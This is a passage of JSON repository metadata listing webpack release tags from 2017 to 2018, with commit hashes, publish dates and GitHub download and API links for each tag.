name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://g